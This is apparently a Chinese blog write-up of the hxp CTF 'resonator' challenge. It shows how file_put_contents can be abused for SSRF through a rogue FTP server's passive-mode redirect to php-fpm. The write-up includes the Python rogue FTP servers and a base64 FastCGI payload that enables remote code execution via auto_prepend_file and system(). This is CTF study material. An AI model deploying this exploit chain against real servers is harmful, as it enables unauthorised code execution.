CTF

HXP resonator(利用file_put_contents打SSRF)

Posted on 2021-01-13,5 min read

源码

<?php
$file = $_GET['file'] ?? '/tmp/file';
$data = $_GET['data'] ?? ':)';
file_put_contents($file, $data);
echo file_get_contents($file);

在Docker中还有个php-cgi
那就是要用这两个函数打php-cgi
但是。这两个函数又不支持gopher。如何打呢

这里可以用FTP的被动模式
在我们file_put_contents('ftp://x.x.x.x/123.php','exploit')
当FTP服务器接收到这个请求后。被动模式会重新返回一个IP和Port。然后请求会转发到新的IP和Port上。主要是为了安全。防止黑客监听20端口的流量。所以这才有被动模式。用随机的端口。进行流量交互

先配置好VSFTPD的被动模式,用wireshark抓一下正常的包。

用python socket实现下发送这些请求。

import socket
host = '0.0.0.0'
port = 22
sk = socket.socket()
sk.bind((host, port))
sk.listen(5)

conn,address = sk.accept()
conn.send("220 (vsFTPd 3.0.3)\n");
print conn.recv(20)
conn.send("331 Please specify the password.\n");
print conn.recv(20)
conn.send("230 Login successful.\n")
print conn.recv(20)
conn.send("200 Switching to Binary mode.\n");
print conn.recv(20)
conn.send("550 Could not get file size.\n");
print conn.recv(20)
conn.send("227 127,0,0,1,8,6952\n")
print conn.recv(20)
conn.send("227 127,0,0,1,8,6952\n")
print conn.recv(20)
conn.send("150\n")
conn.close()

然后测试下。发现流量确实打到本地的9000端口了

还有关于larval debug的RCEhttps://www.ambionics.io/blog/laravel-debug-rce
它的源码有点不一样,简化后如下

<?php
$file=$_GET['file'];
$data=file_get_contents($file);
file_put_contents($file, $data);

这里我想通过vsftpd来配置的。。。然而发现pasv_address配置了半年。不生效。ipv6也关了。又搜到文章。说pasv_address只能填域名。我又把域名绑到了127.0.0.1。发现还是不行。
有大佬知道忘告知😅

通过python自己编写FTP Server
server.py

import socket
def get(conn):
    conn.send("220 (vsFTPd 3.0.3)\n")
    print conn.recv(200)
    conn.send("331 Please specify the password.\n")
    print conn.recv(200)
    conn.send("230 Login successful.\n")
    print conn.recv(200)
    conn.send("200 Switching to Binary mode.\n")
    print conn.recv(200)
    conn.send("213 3\n")
    print conn.recv(200)
    conn.send("229 Entering Extended Passive Mode (|||1337|)\n")
    print conn.recv(200)
    conn.send("150 Opening BINARY mode data connection for /test/test.php (3 bytes).\n")
    conn.send("226 Transfer complete.\n")
    print conn.recv(200)
    conn.send("221 Goodbye.\n")
    conn.close()
def put(conn):
    conn.send("220 (vsFTPd 3.0.3)\n");
    print conn.recv(20)
    conn.send("331 Please specify the password.\n");
    print conn.recv(20)
    conn.send("230 Login successful.\n")
    print conn.recv(20)
    conn.send("200 Switching to Binary mode.\n");
    print conn.recv(20)
    conn.send("550 Could not get file size.\n");
    print conn.recv(20)
    conn.send("227 127,0,0,1,8,6952\n")
    print conn.recv(20)
    conn.send("227 127,0,0,1,8,6952\n")
    print conn.recv(20)
    conn.send("150 Ok to send data.\n")
    conn.send("226 Transfer complete.\n")
    print conn.recv(20)
    conn.send("221 Goodbye.\n");
    conn.close()
host = '0.0.0.0'
port = 22
sk = socket.socket()
sk.bind((host, port))
sk.listen(5)
conn,address = sk.accept()
get(conn)
conn,address=sk.accept()
put(conn)

2.py

import socket
import base64
host = '0.0.0.0'
port = 1337
sk = socket.socket()
sk.bind((host, port))
sk.listen(5)

conn,address = sk.accept()
conn.send(base64.b64decode("AQEAAQAIAAAAAQAAAAAAAAEEAAEBBAQADxBTRVJWRVJfU09GVFdBUkVnbyAvIGZjZ2ljbGllbnQgCwlSRU1PVEVfQUREUjEyNy4wLjAuMQ8IU0VSVkVSX1BST1RPQ09MSFRUUC8xLjEOAkNPTlRFTlRfTEVOR1RINTgOBFJFUVVFU1RfTUVUSE9EUE9TVAlLUEhQX1ZBTFVFYWxsb3dfdXJsX2luY2x1ZGUgPSBPbgpkaXNhYmxlX2Z1bmN0aW9ucyA9IAphdXRvX3ByZXBlbmRfZmlsZSA9IHBocDovL2lucHV0DxdTQ1JJUFRfRklMRU5BTUUvdmFyL3d3dy9odG1sL2luZGV4LnBocA0BRE9DVU1FTlRfUk9PVC8AAAAAAQQAAQAAAAABBQABADoEADw/cGhwIHN5c3RlbSgnd2hvYW1pJyk7ZGllKCctLS0tLU1hZGUtYnktU3B5RDNyLS0tLS0KJyk7Pz4AAAAA"))
conn.close()

base64编码的为EXP

下一篇: thinkphp6的一些链子→